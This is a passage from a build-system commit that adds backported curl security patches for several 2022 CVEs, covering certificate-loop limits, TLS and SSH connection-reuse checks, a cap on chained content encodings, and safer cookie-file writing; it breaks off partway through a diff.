15Upstream-Status: Backport [https://github.com/curl/curl/commit/5c7da89d404bf59c8dd82a001119a16d18365917]
16Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
17---
18 lib/vtls/nss.c | 8 ++++++++
19 1 file changed, 8 insertions(+)
20
21diff --git a/lib/vtls/nss.c b/lib/vtls/nss.c
22index 375c78b..86102f7 100644
23--- a/lib/vtls/nss.c
24+++ b/lib/vtls/nss.c
25@@ -950,6 +950,9 @@ static void display_cert_info(struct Curl_easy *data,
26 PR_Free(common_name);
27 }
28
29+/* A number of certs that will never occur in a real server handshake */
30+#define TOO_MANY_CERTS 300
31+
32 static CURLcode display_conn_info(struct connectdata *conn, PRFileDesc *sock)
33 {
34 CURLcode result = CURLE_OK;
35@@ -986,6 +989,11 @@ static CURLcode display_conn_info(struct connectdata *conn, PRFileDesc *sock)
36 cert2 = CERT_FindCertIssuer(cert, now, certUsageSSLCA);
37 while(cert2) {
38 i++;
39+ if(i >= TOO_MANY_CERTS) {
40+ CERT_DestroyCertificate(cert2);
41+ failf(data, "certificate loop");
42+ return CURLE_SSL_CERTPROBLEM;
43+ }
44 if(cert2->isRoot) {
45 CERT_DestroyCertificate(cert2);
46 break;
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27782-1.patch b/meta/recipes-support/curl/curl/CVE-2022-27782-1.patch
new file mode 100644
index 0000000000..6b6d0e1938
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27782-1.patch
@@ -0,0 +1,363 @@
1From 907a16c832d9ce0ffa7e9b2297548063095a7242 Mon Sep 17 00:00:00 2001
2From: Daniel Stenberg <daniel@haxx.se>
3Date: Mon, 9 May 2022 23:13:53 +0200
4Subject: [PATCH] tls: check more TLS details for connection reuse
5
6CVE-2022-27782
7
8Reported-by: Harry Sintonen
9Bug: https://curl.se/docs/CVE-2022-27782.html
10Closes #8825
11
12Upstream-Status: Backport [https://github.com/curl/curl/commit/f18af4f874cecab82a9797e8c7541e0990c7a64c]
13Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
14---
15 lib/setopt.c | 29 +++++++++++++++++------------
16 lib/url.c | 17 ++++++++++-------
17 lib/urldata.h | 13 +++++++------
18 lib/vtls/gtls.c | 30 ++++++++++++++++--------------
19 lib/vtls/mbedtls.c | 2 +-
20 lib/vtls/nss.c | 6 +++---
21 lib/vtls/openssl.c | 10 +++++-----
22 lib/vtls/vtls.c | 1 +
23 8 files changed, 60 insertions(+), 48 deletions(-)
24
25diff --git a/lib/setopt.c b/lib/setopt.c
26index 4648c87..bebb2e4 100644
27--- a/lib/setopt.c
28+++ b/lib/setopt.c
29@@ -2130,6 +2130,7 @@ CURLcode Curl_vsetopt(struct Curl_easy *data, CURLoption option, va_list param)
30
31 case CURLOPT_SSL_OPTIONS:
32 arg = va_arg(param, long);
33+ data->set.ssl.primary.ssl_options = (unsigned char)(arg & 0xff);
34 data->set.ssl.enable_beast =
35 (bool)((arg&CURLSSLOPT_ALLOW_BEAST) ? TRUE : FALSE);
36 data->set.ssl.no_revoke = !!(arg & CURLSSLOPT_NO_REVOKE);
37@@ -2139,6 +2140,7 @@ CURLcode Curl_vsetopt(struct Curl_easy *data, CURLoption option, va_list param)
38 #ifndef CURL_DISABLE_PROXY
39 case CURLOPT_PROXY_SSL_OPTIONS:
40 arg = va_arg(param, long);
41+ data->set.proxy_ssl.primary.ssl_options = (unsigned char)(arg & 0xff);
42 data->set.proxy_ssl.enable_beast =
43 (bool)((arg&CURLSSLOPT_ALLOW_BEAST) ? TRUE : FALSE);
44 data->set.proxy_ssl.no_revoke = !!(arg & CURLSSLOPT_NO_REVOKE);
45@@ -2541,44 +2543,47 @@ CURLcode Curl_vsetopt(struct Curl_easy *data, CURLoption option, va_list param)
46 case CURLOPT_TLSAUTH_USERNAME:
47 result = Curl_setstropt(&data->set.str[STRING_TLSAUTH_USERNAME_ORIG],
48 va_arg(param, char *));
49- if(data->set.str[STRING_TLSAUTH_USERNAME_ORIG] && !data->set.ssl.authtype)
50- data->set.ssl.authtype = CURL_TLSAUTH_SRP; /* default to SRP */
51+ if(data->set.str[STRING_TLSAUTH_USERNAME_ORIG] &&
52+ !data->set.ssl.primary.authtype)
53+ data->set.ssl.primary.authtype = CURL_TLSAUTH_SRP; /* default to SRP */
54 break;
55 case CURLOPT_PROXY_TLSAUTH_USERNAME:
56 result = Curl_setstropt(&data->set.str[STRING_TLSAUTH_USERNAME_PROXY],
57 va_arg(param, char *));
58 if(data->set.str[STRING_TLSAUTH_USERNAME_PROXY] &&
59- !data->set.proxy_ssl.authtype)
60- data->set.proxy_ssl.authtype = CURL_TLSAUTH_SRP; /* default to SRP */
61+ !data->set.proxy_ssl.primary.authtype)
62+ data->set.proxy_ssl.primary.authtype = CURL_TLSAUTH_SRP; /* default to
63+ SRP */
64 break;
65 case CURLOPT_TLSAUTH_PASSWORD:
66 result = Curl_setstropt(&data->set.str[STRING_TLSAUTH_PASSWORD_ORIG],
67 va_arg(param, char *));
68- if(data->set.str[STRING_TLSAUTH_USERNAME_ORIG] && !data->set.ssl.authtype)
69- data->set.ssl.authtype = CURL_TLSAUTH_SRP; /* default to SRP */
70+ if(data->set.str[STRING_TLSAUTH_USERNAME_ORIG] &&
71+ !data->set.ssl.primary.authtype)
72+ data->set.ssl.primary.authtype = CURL_TLSAUTH_SRP; /* default to SRP */
73 break;
74 case CURLOPT_PROXY_TLSAUTH_PASSWORD:
75 result = Curl_setstropt(&data->set.str[STRING_TLSAUTH_PASSWORD_PROXY],
76 va_arg(param, char *));
77 if(data->set.str[STRING_TLSAUTH_USERNAME_PROXY] &&
78- !data->set.proxy_ssl.authtype)
79- data->set.proxy_ssl.authtype = CURL_TLSAUTH_SRP; /* default to SRP */
80+ !data->set.proxy_ssl.primary.authtype)
81+ data->set.proxy_ssl.primary.authtype = CURL_TLSAUTH_SRP; /* default */
82 break;
83 case CURLOPT_TLSAUTH_TYPE:
84 argptr = va_arg(param, char *);
85 if(!argptr ||
86 strncasecompare(argptr, "SRP", strlen("SRP")))
87- data->set.ssl.authtype = CURL_TLSAUTH_SRP;
88+ data->set.ssl.primary.authtype = CURL_TLSAUTH_SRP;
89 else
90- data->set.ssl.authtype = CURL_TLSAUTH_NONE;
91+ data->set.ssl.primary.authtype = CURL_TLSAUTH_NONE;
92 break;
93 case CURLOPT_PROXY_TLSAUTH_TYPE:
94 argptr = va_arg(param, char *);
95 if(!argptr ||
96 strncasecompare(argptr, "SRP", strlen("SRP")))
97- data->set.proxy_ssl.authtype = CURL_TLSAUTH_SRP;
98+ data->set.proxy_ssl.primary.authtype = CURL_TLSAUTH_SRP;
99 else
100- data->set.proxy_ssl.authtype = CURL_TLSAUTH_NONE;
101+ data->set.proxy_ssl.primary.authtype = CURL_TLSAUTH_NONE;
102 break;
103 #endif
104 #ifdef USE_ARES
105diff --git a/lib/url.c b/lib/url.c
106index efa3dc7..6518be9 100644
107--- a/lib/url.c
108+++ b/lib/url.c
109@@ -482,7 +482,7 @@ CURLcode Curl_init_userdefined(struct Curl_easy *data)
110 set->ssl.primary.verifypeer = TRUE;
111 set->ssl.primary.verifyhost = TRUE;
112 #ifdef USE_TLS_SRP
113- set->ssl.authtype = CURL_TLSAUTH_NONE;
114+ set->ssl.primary.authtype = CURL_TLSAUTH_NONE;
115 #endif
116 set->ssh_auth_types = CURLSSH_AUTH_DEFAULT; /* defaults to any auth
117 type */
118@@ -3594,8 +3594,9 @@ static CURLcode create_conn(struct Curl_easy *data,
119 data->set.proxy_ssl.primary.pinned_key =
120 data->set.str[STRING_SSL_PINNEDPUBLICKEY_PROXY];
121
122- data->set.ssl.CRLfile = data->set.str[STRING_SSL_CRLFILE_ORIG];
123- data->set.proxy_ssl.CRLfile = data->set.str[STRING_SSL_CRLFILE_PROXY];
124+ data->set.ssl.primary.CRLfile = data->set.str[STRING_SSL_CRLFILE_ORIG];
125+ data->set.proxy_ssl.primary.CRLfile =
126+ data->set.str[STRING_SSL_CRLFILE_PROXY];
127 data->set.ssl.cert = data->set.str[STRING_CERT_ORIG];
128 data->set.proxy_ssl.cert = data->set.str[STRING_CERT_PROXY];
129 data->set.ssl.cert_type = data->set.str[STRING_CERT_TYPE_ORIG];
130@@ -3609,10 +3610,12 @@ static CURLcode create_conn(struct Curl_easy *data,
131 data->set.ssl.primary.clientcert = data->set.str[STRING_CERT_ORIG];
132 data->set.proxy_ssl.primary.clientcert = data->set.str[STRING_CERT_PROXY];
133 #ifdef USE_TLS_SRP
134- data->set.ssl.username = data->set.str[STRING_TLSAUTH_USERNAME_ORIG];
135- data->set.proxy_ssl.username = data->set.str[STRING_TLSAUTH_USERNAME_PROXY];
136- data->set.ssl.password = data->set.str[STRING_TLSAUTH_PASSWORD_ORIG];
137- data->set.proxy_ssl.password = data->set.str[STRING_TLSAUTH_PASSWORD_PROXY];
138+ data->set.ssl.primary.username = data->set.str[STRING_TLSAUTH_USERNAME_ORIG];
139+ data->set.proxy_ssl.primary.username =
140+ data->set.str[STRING_TLSAUTH_USERNAME_PROXY];
141+ data->set.ssl.primary.password = data->set.str[STRING_TLSAUTH_PASSWORD_ORIG];
142+ data->set.proxy_ssl.primary.password =
143+ data->set.str[STRING_TLSAUTH_PASSWORD_PROXY];
144 #endif
145
146 if(!Curl_clone_primary_ssl_config(&data->set.ssl.primary,
147diff --git a/lib/urldata.h b/lib/urldata.h
148index ab1b267..ad0ef8f 100644
149--- a/lib/urldata.h
150+++ b/lib/urldata.h
151@@ -231,6 +231,13 @@ struct ssl_primary_config {
152 char *cipher_list; /* list of ciphers to use */
153 char *cipher_list13; /* list of TLS 1.3 cipher suites to use */
154 char *pinned_key;
155+ char *CRLfile; /* CRL to check certificate revocation */
156+ #ifdef USE_TLS_SRP
157+ char *username; /* TLS username (for, e.g., SRP) */
158+ char *password; /* TLS password (for, e.g., SRP) */
159+ enum CURL_TLSAUTH authtype; /* TLS authentication type (default SRP) */
160+ #endif
161+ unsigned char ssl_options; /* the CURLOPT_SSL_OPTIONS bitmask */
162 BIT(verifypeer); /* set TRUE if this is desired */
163 BIT(verifyhost); /* set TRUE if CN/SAN must match hostname */
164 BIT(verifystatus); /* set TRUE if certificate status must be checked */
165@@ -240,7 +247,6 @@ struct ssl_primary_config {
166 struct ssl_config_data {
167 struct ssl_primary_config primary;
168 long certverifyresult; /* result from the certificate verification */
169- char *CRLfile; /* CRL to check certificate revocation */
170 curl_ssl_ctx_callback fsslctx; /* function to initialize ssl ctx */
171 void *fsslctxp; /* parameter for call back */
172 char *cert; /* client certificate file name */
173@@ -248,11 +254,6 @@ struct ssl_config_data {
174 char *key; /* private key file name */
175 char *key_type; /* format for private key (default: PEM) */
176 char *key_passwd; /* plain text private key password */
177-#ifdef USE_TLS_SRP
178- char *username; /* TLS username (for, e.g., SRP) */
179- char *password; /* TLS password (for, e.g., SRP) */
180- enum CURL_TLSAUTH authtype; /* TLS authentication type (default SRP) */
181-#endif
182 BIT(certinfo); /* gather lots of certificate info */
183 BIT(falsestart);
184 BIT(enable_beast); /* allow this flaw for interoperability's sake*/
185diff --git a/lib/vtls/gtls.c b/lib/vtls/gtls.c
186index 3d0758d..92c301c 100644
187--- a/lib/vtls/gtls.c
188+++ b/lib/vtls/gtls.c
189@@ -581,9 +581,10 @@ gtls_connect_step1(struct connectdata *conn,
190 }
191
192 #ifdef USE_TLS_SRP
193- if((SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP) &&
194+ if((SSL_SET_OPTION(primary.authtype) == CURL_TLSAUTH_SRP) &&
195 Curl_allow_auth_to_host(data)) {
196- infof(data, "Using TLS-SRP username: %s\n", SSL_SET_OPTION(username));
197+ infof(data, "Using TLS-SRP username: %s\n",
198+ SSL_SET_OPTION(primary.username));
199
200 rc = gnutls_srp_allocate_client_credentials(&BACKEND->srp_client_cred);
201 if(rc != GNUTLS_E_SUCCESS) {
202@@ -593,8 +594,8 @@ gtls_connect_step1(struct connectdata *conn,
203 }
204
205 rc = gnutls_srp_set_client_credentials(BACKEND->srp_client_cred,
206- SSL_SET_OPTION(username),
207- SSL_SET_OPTION(password));
208+ SSL_SET_OPTION(primary.username),
209+ SSL_SET_OPTION(primary.password));
210 if(rc != GNUTLS_E_SUCCESS) {
211 failf(data, "gnutls_srp_set_client_cred() failed: %s",
212 gnutls_strerror(rc));
213@@ -648,19 +649,19 @@ gtls_connect_step1(struct connectdata *conn,
214 }
215 #endif
216
217- if(SSL_SET_OPTION(CRLfile)) {
218+ if(SSL_SET_OPTION(primary.CRLfile)) {
219 /* set the CRL list file */
220 rc = gnutls_certificate_set_x509_crl_file(BACKEND->cred,
221- SSL_SET_OPTION(CRLfile),
222+ SSL_SET_OPTION(primary.CRLfile),
223 GNUTLS_X509_FMT_PEM);
224 if(rc < 0) {
225 failf(data, "error reading crl file %s (%s)",
226- SSL_SET_OPTION(CRLfile), gnutls_strerror(rc));
227+ SSL_SET_OPTION(primary.CRLfile), gnutls_strerror(rc));
228 return CURLE_SSL_CRL_BADFILE;
229 }
230 else
231 infof(data, "found %d CRL in %s\n",
232- rc, SSL_SET_OPTION(CRLfile));
233+ rc, SSL_SET_OPTION(primary.CRLfile));
234 }
235
236 /* Initialize TLS session as a client */
237@@ -879,7 +880,7 @@ gtls_connect_step1(struct connectdata *conn,
238
239 #ifdef USE_TLS_SRP
240 /* put the credentials to the current session */
241- if(SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP) {
242+ if(SSL_SET_OPTION(primary.authtype) == CURL_TLSAUTH_SRP) {
243 rc = gnutls_credentials_set(session, GNUTLS_CRD_SRP,
244 BACKEND->srp_client_cred);
245 if(rc != GNUTLS_E_SUCCESS) {
246@@ -1061,8 +1062,8 @@ gtls_connect_step3(struct connectdata *conn,
247 SSL_CONN_CONFIG(verifyhost) ||
248 SSL_CONN_CONFIG(issuercert)) {
249 #ifdef USE_TLS_SRP
250- if(SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP
251- && SSL_SET_OPTION(username) != NULL
252+ if(SSL_SET_OPTION(primary.authtype) == CURL_TLSAUTH_SRP
253+ && SSL_SET_OPTION(primary.username) != NULL
254 && !SSL_CONN_CONFIG(verifypeer)
255 && gnutls_cipher_get(session)) {
256 /* no peer cert, but auth is ok if we have SRP user and cipher and no
257@@ -1116,7 +1117,8 @@ gtls_connect_step3(struct connectdata *conn,
258 failf(data, "server certificate verification failed. CAfile: %s "
259 "CRLfile: %s", SSL_CONN_CONFIG(CAfile) ? SSL_CONN_CONFIG(CAfile):
260 "none",
261- SSL_SET_OPTION(CRLfile)?SSL_SET_OPTION(CRLfile):"none");
262+ SSL_SET_OPTION(primary.CRLfile) ?
263+ SSL_SET_OPTION(primary.CRLfile) : "none");
264 return CURLE_PEER_FAILED_VERIFICATION;
265 }
266 else
267@@ -1703,8 +1705,8 @@ static int Curl_gtls_shutdown(struct connectdata *conn, int sockindex)
268 gnutls_certificate_free_credentials(BACKEND->cred);
269
270 #ifdef USE_TLS_SRP
271- if(SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP
272- && SSL_SET_OPTION(username) != NULL)
273+ if(SSL_SET_OPTION(primary.authtype) == CURL_TLSAUTH_SRP
274+ && SSL_SET_OPTION(primary.username) != NULL)
275 gnutls_srp_free_client_credentials(BACKEND->srp_client_cred);
276 #endif
277
278diff --git a/lib/vtls/mbedtls.c b/lib/vtls/mbedtls.c
279index 19df847..62d2b00 100644
280--- a/lib/vtls/mbedtls.c
281+++ b/lib/vtls/mbedtls.c
282@@ -245,7 +245,7 @@ mbed_connect_step1(struct connectdata *conn,
283 const bool verifypeer = SSL_CONN_CONFIG(verifypeer);
284 const char * const ssl_capath = SSL_CONN_CONFIG(CApath);
285 char * const ssl_cert = SSL_SET_OPTION(cert);
286- const char * const ssl_crlfile = SSL_SET_OPTION(CRLfile);
287+ const char * const ssl_crlfile = SSL_SET_OPTION(primary.CRLfile);
288 const char * const hostname = SSL_IS_PROXY() ? conn->http_proxy.host.name :
289 conn->host.name;
290 const long int port = SSL_IS_PROXY() ? conn->port : conn->remote_port;
291diff --git a/lib/vtls/nss.c b/lib/vtls/nss.c
292index 86102f7..62fd7a2 100644
293--- a/lib/vtls/nss.c
294+++ b/lib/vtls/nss.c
295@@ -1955,13 +1955,13 @@ static CURLcode nss_setup_connect(struct connectdata *conn, int sockindex)
296 }
297 }
298
299- if(SSL_SET_OPTION(CRLfile)) {
300- const CURLcode rv = nss_load_crl(SSL_SET_OPTION(CRLfile));
301+ if(SSL_SET_OPTION(primary.CRLfile)) {
302+ const CURLcode rv = nss_load_crl(SSL_SET_OPTION(primary.CRLfile));
303 if(rv) {
304 result = rv;
305 goto error;
306 }
307- infof(data, " CRLfile: %s\n", SSL_SET_OPTION(CRLfile));
308+ infof(data, " CRLfile: %s\n", SSL_SET_OPTION(primary.CRLfile));
309 }
310
311 if(SSL_SET_OPTION(cert)) {
312diff --git a/lib/vtls/openssl.c b/lib/vtls/openssl.c
313index a14cecc..ec5a8f5 100644
314--- a/lib/vtls/openssl.c
315+++ b/lib/vtls/openssl.c
316@@ -2454,14 +2454,14 @@ static CURLcode ossl_connect_step1(struct connectdata *conn, int sockindex)
317 &data->set.proxy_ssl.certverifyresult : &data->set.ssl.certverifyresult;
318 const long int ssl_version = SSL_CONN_CONFIG(version);
319 #ifdef USE_TLS_SRP
320- const enum CURL_TLSAUTH ssl_authtype = SSL_SET_OPTION(authtype);
321+ const enum CURL_TLSAUTH ssl_authtype = SSL_SET_OPTION(primary.authtype);
322 #endif
323 char * const ssl_cert = SSL_SET_OPTION(cert);
324 const char * const ssl_cert_type = SSL_SET_OPTION(cert_type);
325 const char * const ssl_cafile = SSL_CONN_CONFIG(CAfile);
326 const char * const ssl_capath = SSL_CONN_CONFIG(CApath);
327 const bool verifypeer = SSL_CONN_CONFIG(verifypeer);
328- const char * const ssl_crlfile = SSL_SET_OPTION(CRLfile);
329+ const char * const ssl_crlfile = SSL_SET_OPTION(primary.CRLfile);
330 char error_buffer[256];
331
332 DEBUGASSERT(ssl_connect_1 == connssl->connecting_state);
333@@ -2741,15 +2741,15 @@ static CURLcode ossl_connect_step1(struct connectdata *conn, int sockindex)
334 #ifdef USE_TLS_SRP
335 if((ssl_authtype == CURL_TLSAUTH_SRP) &&
336 Curl_allow_auth_to_host(data)) {
337- char * const ssl_username = SSL_SET_OPTION(username);
338-
339+ char * const ssl_username = SSL_SET_OPTION(primary.username);
340+ char * const ssl_password = SSL_SET_OPTION(primary.password);
341 infof(data, "Using TLS-SRP username: %s\n", ssl_username);
342
343 if(!SSL_CTX_set_srp_username(BACKEND->ctx, ssl_username)) {
344 failf(data, "Unable to set SRP user name");
345 return CURLE_BAD_FUNCTION_ARGUMENT;
346 }
347- if(!SSL_CTX_set_srp_password(BACKEND->ctx, SSL_SET_OPTION(password))) {
348+ if(!SSL_CTX_set_srp_password(BACKEND->ctx, ssl_password)) {
349 failf(data, "failed setting SRP password");
350 return CURLE_BAD_FUNCTION_ARGUMENT;
351 }
352diff --git a/lib/vtls/vtls.c b/lib/vtls/vtls.c
353index e38f74e..e8cb70f 100644
354--- a/lib/vtls/vtls.c
355+++ b/lib/vtls/vtls.c
356@@ -89,6 +89,7 @@ Curl_ssl_config_matches(struct ssl_primary_config* data,
357 {
358 if((data->version == needle->version) &&
359 (data->version_max == needle->version_max) &&
360+ (data->ssl_options == needle->ssl_options) &&
361 (data->verifypeer == needle->verifypeer) &&
362 (data->verifyhost == needle->verifyhost) &&
363 (data->verifystatus == needle->verifystatus) &&
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27782-2.patch b/meta/recipes-support/curl/curl/CVE-2022-27782-2.patch
new file mode 100644
index 0000000000..3d56025210
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27782-2.patch
@@ -0,0 +1,71 @@
1From 0a115a8903dffc7f723d1d4d71fb821d69eb8761 Mon Sep 17 00:00:00 2001
2From: Daniel Stenberg <daniel@haxx.se>
3Date: Mon, 9 May 2022 23:13:53 +0200
4Subject: [PATCH] url: check SSH config match on connection reuse
5
6CVE-2022-27782
7
8Reported-by: Harry Sintonen
9Bug: https://curl.se/docs/CVE-2022-27782.html
10Closes #8825
11
12Upstream-Status: Backport [https://github.com/curl/curl/commit/1645e9b44505abd5cbaf65da5282c3f33b5924a5]
13Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
14---
15 lib/url.c | 11 +++++++++++
16 lib/vssh/ssh.h | 6 +++---
17 2 files changed, 14 insertions(+), 3 deletions(-)
18
19diff --git a/lib/url.c b/lib/url.c
20index 6518be9..8da0245 100644
21--- a/lib/url.c
22+++ b/lib/url.c
23@@ -1027,6 +1027,12 @@ static void prune_dead_connections(struct Curl_easy *data)
24 }
25 }
26
27+static bool ssh_config_matches(struct connectdata *one,
28+ struct connectdata *two)
29+{
30+ return (Curl_safecmp(one->proto.sshc.rsa, two->proto.sshc.rsa) &&
31+ Curl_safecmp(one->proto.sshc.rsa_pub, two->proto.sshc.rsa_pub));
32+}
33 /*
34 * Given one filled in connection struct (named needle), this function should
35 * detect if there already is one that has all the significant details
36@@ -1260,6 +1266,11 @@ ConnectionExists(struct Curl_easy *data,
37 }
38 }
39
40+ if(get_protocol_family(needle->handler->protocol) == PROTO_FAMILY_SSH) {
41+ if(!ssh_config_matches(needle, check))
42+ continue;
43+ }
44+
45 if(!needle->bits.httpproxy || (needle->handler->flags&PROTOPT_SSL) ||
46 needle->bits.tunnel_proxy) {
47 /* The requested connection does not use a HTTP proxy or it uses SSL or
48diff --git a/lib/vssh/ssh.h b/lib/vssh/ssh.h
49index 0d4ee52..8f2632e 100644
50--- a/lib/vssh/ssh.h
51+++ b/lib/vssh/ssh.h
52@@ -7,7 +7,7 @@
53 * | (__| |_| | _ <| |___
54 * \___|\___/|_| \_\_____|
55 *
56- * Copyright (C) 1998 - 2020, Daniel Stenberg, <daniel@haxx.se>, et al.
57+ * Copyright (C) 1998 - 2022, Daniel Stenberg, <daniel@haxx.se>, et al.
58 *
59 * This software is licensed as described in the file COPYING, which
60 * you should have received as part of this distribution. The terms
61@@ -120,8 +120,8 @@ struct ssh_conn {
62
63 /* common */
64 const char *passphrase; /* pass-phrase to use */
65- char *rsa_pub; /* path name */
66- char *rsa; /* path name */
67+ char *rsa_pub; /* strdup'ed public key file */
68+ char *rsa; /* strdup'ed private key file */
69 bool authed; /* the connection has been authenticated fine */
70 sshstate state; /* always use ssh.c:state() to change state! */
71 sshstate nextstate; /* the state to goto after stopping */
diff --git a/meta/recipes-support/curl/curl/CVE-2022-32206.patch b/meta/recipes-support/curl/curl/CVE-2022-32206.patch
new file mode 100644
index 0000000000..3d76aeb43d
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-32206.patch
@@ -0,0 +1,52 @@
1From 25e7be39be5f8ed696b6085ced9cf6c17e6128f4 Mon Sep 17 00:00:00 2001
2From: Daniel Stenberg <daniel@haxx.se>
3Date: Mon, 16 May 2022 16:28:13 +0200
4Subject: [PATCH] content_encoding: return error on too many compression steps
5
6The max allowed steps is arbitrarily set to 5.
7
8Bug: https://curl.se/docs/CVE-2022-32206.html
9CVE-2022-32206
10Reported-by: Harry Sintonen
11Closes #9049
12
13Upstream-Status: Backport [https://github.com/curl/curl/commit/3a09fbb7f264c67c43]
14Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
15---
16 lib/content_encoding.c | 9 +++++++++
17 1 file changed, 9 insertions(+)
18
19diff --git a/lib/content_encoding.c b/lib/content_encoding.c
20index 6d47537..91e621f 100644
21--- a/lib/content_encoding.c
22+++ b/lib/content_encoding.c
23@@ -934,6 +934,9 @@ static const content_encoding *find_encoding(const char *name, size_t len)
24 return NULL;
25 }
26
27+/* allow no more than 5 "chained" compression steps */
28+#define MAX_ENCODE_STACK 5
29+
30 /* Set-up the unencoding stack from the Content-Encoding header value.
31 * See RFC 7231 section 3.1.2.2. */
32 CURLcode Curl_build_unencoding_stack(struct connectdata *conn,
33@@ -941,6 +944,7 @@ CURLcode Curl_build_unencoding_stack(struct connectdata *conn,
34 {
35 struct Curl_easy *data = conn->data;
36 struct SingleRequest *k = &data->req;
37+ int counter = 0;
38
39 do {
40 const char *name;
41@@ -975,6 +979,11 @@ CURLcode Curl_build_unencoding_stack(struct connectdata *conn,
42 if(!encoding)
43 encoding = &error_encoding; /* Defer error at stack use. */
44
45+ if(++counter >= MAX_ENCODE_STACK) {
46+ failf(data, "Reject response due to %u content encodings",
47+ counter);
48+ return CURLE_BAD_CONTENT_ENCODING;
49+ }
50 /* Stack the unencoding stage. */
51 writer = new_unencoding_writer(conn, encoding, k->writer_stack);
52 if(!writer)
diff --git a/meta/recipes-support/curl/curl/CVE-2022-32207.patch b/meta/recipes-support/curl/curl/CVE-2022-32207.patch
new file mode 100644
index 0000000000..f75aaecd64
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-32207.patch
@@ -0,0 +1,284 @@
1From af92181055d7d64dfc0bc9d5a13c8b98af3196be Mon Sep 17 00:00:00 2001
2From: Daniel Stenberg <daniel@haxx.se>
3Date: Wed, 25 May 2022 10:09:53 +0200
4Subject: [PATCH] fopen: add Curl_fopen() for better overwriting of files
5
6Bug: https://curl.se/docs/CVE-2022-32207.html
7CVE-2022-32207
8Reported-by: Harry Sintonen
9Closes #9050
10
11Upstream-Status: Backport [https://github.com/curl/curl/commit/20f9dd6bae50b]
12Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
13---
14 CMakeLists.txt | 1 +
15 configure.ac | 1 +
16 lib/Makefile.inc | 4 +-
17 lib/cookie.c | 19 ++-----
18 lib/curl_config.h.cmake | 3 ++
19 lib/fopen.c | 113 ++++++++++++++++++++++++++++++++++++++++
20 lib/fopen.h | 30 +++++++++++
21 7 files changed, 155 insertions(+), 16 deletions(-)
22 create mode 100644 lib/fopen.c
23 create mode 100644 lib/fopen.h
24
25diff --git a/CMakeLists.txt b/CMakeLists.txt
26index 73b053b..cc587b0 100644
27--- a/CMakeLists.txt
28+++ b/CMakeLists.txt
29@@ -869,6 +869,7 @@ elseif(HAVE_LIBSOCKET)
30 set(CMAKE_REQUIRED_LIBRARIES socket)
31 endif()
32
33+check_symbol_exists(fchmod "${CURL_INCLUDES}" HAVE_FCHMOD)
34 check_symbol_exists(basename "${CURL_INCLUDES}" HAVE_BASENAME)
35 check_symbol_exists(socket "${CURL_INCLUDES}" HAVE_SOCKET)
36 check_symbol_exists(select "${CURL_INCLUDES}" HAVE_SELECT)
37diff --git a/configure.ac b/configure.ac
38index d090622..7071077 100755
39--- a/configure.ac
40+++ b/configure.ac
41@@ -4059,6 +4059,7 @@ AC_CHECK_DECLS([getpwuid_r], [], [AC_DEFINE(HAVE_DECL_GETPWUID_R_MISSING, 1, "Se
42
43
44 AC_CHECK_FUNCS([fnmatch \
45+ fchmod \
46 geteuid \
47 getpass_r \
48 getppid \
49diff --git a/lib/Makefile.inc b/lib/Makefile.inc
50index 46ded90..79307d8 100644
51--- a/lib/Makefile.inc
52+++ b/lib/Makefile.inc
53@@ -63,7 +63,7 @@ LIB_CFILES = file.c timeval.c base64.c hostip.c progress.c formdata.c \
54 curl_multibyte.c hostcheck.c conncache.c dotdot.c \
55 x509asn1.c http2.c smb.c curl_endian.c curl_des.c system_win32.c \
56 mime.c sha256.c setopt.c curl_path.c curl_ctype.c curl_range.c psl.c \
57- doh.c urlapi.c curl_get_line.c altsvc.c socketpair.c rename.c
58+ doh.c urlapi.c curl_get_line.c altsvc.c socketpair.c rename.c fopen.c
59
60 LIB_HFILES = arpa_telnet.h netrc.h file.h timeval.h hostip.h progress.h \
61 formdata.h cookie.h http.h sendf.h ftp.h url.h dict.h if2ip.h \
62@@ -84,7 +84,7 @@ LIB_HFILES = arpa_telnet.h netrc.h file.h timeval.h hostip.h progress.h \
63 x509asn1.h http2.h sigpipe.h smb.h curl_endian.h curl_des.h \
64 curl_printf.h system_win32.h rand.h mime.h curl_sha256.h setopt.h \
65 curl_path.h curl_ctype.h curl_range.h psl.h doh.h urlapi-int.h \
66- curl_get_line.h altsvc.h quic.h socketpair.h rename.h
67+ curl_get_line.h altsvc.h quic.h socketpair.h rename.h fopen.h
68
69 LIB_RCFILES = libcurl.rc
70
71diff --git a/lib/cookie.c b/lib/cookie.c
72index 68054e1..a9ad20a 100644
73--- a/lib/cookie.c
74+++ b/lib/cookie.c
75@@ -97,8 +97,8 @@ Example set of cookies:
76 #include "curl_memrchr.h"
77 #include "inet_pton.h"
78 #include "parsedate.h"
79-#include "rand.h"
80 #include "rename.h"
81+#include "fopen.h"
82
83 /* The last 3 #include files should be in this order */
84 #include "curl_printf.h"
85@@ -1524,18 +1524,9 @@ static int cookie_output(struct Curl_easy *data,
86 use_stdout = TRUE;
87 }
88 else {
89- unsigned char randsuffix[9];
90-
91- if(Curl_rand_hex(data, randsuffix, sizeof(randsuffix)))
92- return 2;
93-
94- tempstore = aprintf("%s.%s.tmp", filename, randsuffix);
95- if(!tempstore)
96- return 1;
97-
98- out = fopen(tempstore, FOPEN_WRITETEXT);
99- if(!out)
100- goto error;
101+ error = Curl_fopen(data, filename, &out, &tempstore);
102+ if(error)
103+ goto error;
104 }
105
106 fputs("# Netscape HTTP Cookie File\n"
107@@ -1581,7 +1572,7 @@ static int cookie_output(struct Curl_easy *data,
108 if(!use_stdout) {
109 fclose(out);
110 out = NULL;
111- if(Curl_rename(tempstore, filename)) {
112+ if(tempstore && Curl_rename(tempstore, filename)) {
113 unlink(tempstore);
114 goto error;
115 }
116diff --git a/lib/curl_config.h.cmake b/lib/curl_config.h.cmake
117index 98cdf51..fe43751 100644
118--- a/lib/curl_config.h.cmake
